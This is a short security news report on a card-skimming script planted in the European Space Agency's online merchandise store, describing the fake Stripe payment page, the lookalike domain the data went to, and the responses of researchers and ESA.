The European Space Agency (ESA) merchandise store fell victim to a cyberattack in which malicious actors implanted a script to load a fraudulent payment page via Stripe. This breach was uncovered on December 23, when the script, activated during the final stage of transactions, harvested user data, including credit card information.
With a budget exceeding €10 billion, ESA spearheads groundbreaking advancements in space exploration, ranging from astronaut training to the development of rockets and satellites. The online store, licensed to sell ESA-branded memorabilia, has temporarily suspended operations, leaving a notice on its website stating it is “temporarily out of orbit.”
E-commerce security firm Sansec identified the malicious code and warned that the store’s integration with ESA systems could pose a threat not only to customers but also to agency employees.
The malware embedded in the official ESA store directed data to a domain resembling the legitimate one but utilizing a different top-level domain (TLD). Instead of the authorized “esaspaceshop[.]com,” attackers employed “esaspaceshop[.]pics,” as observed in the website’s source code.
Researchers from Source Defense confirmed that the counterfeit payment page was meticulously disguised as genuine, incorporating elements from the Stripe SDK. Visually indistinguishable from the original, the fake page was served directly from ESA’s site, leaving users unsuspecting.
Although the store has since removed the fraudulent payment page, the malicious script remains embedded in its source code. ESA clarified that the store operates on third-party infrastructure, and the agency does not manage its data. A Whois lookup corroborates that ESA’s domain and its store are registered separately.
Related Posts:
- Cisco Patches High Vulnerability in ESA and Secure Email and Web Manager
- The National Police Agency have the ability to crack iPhone
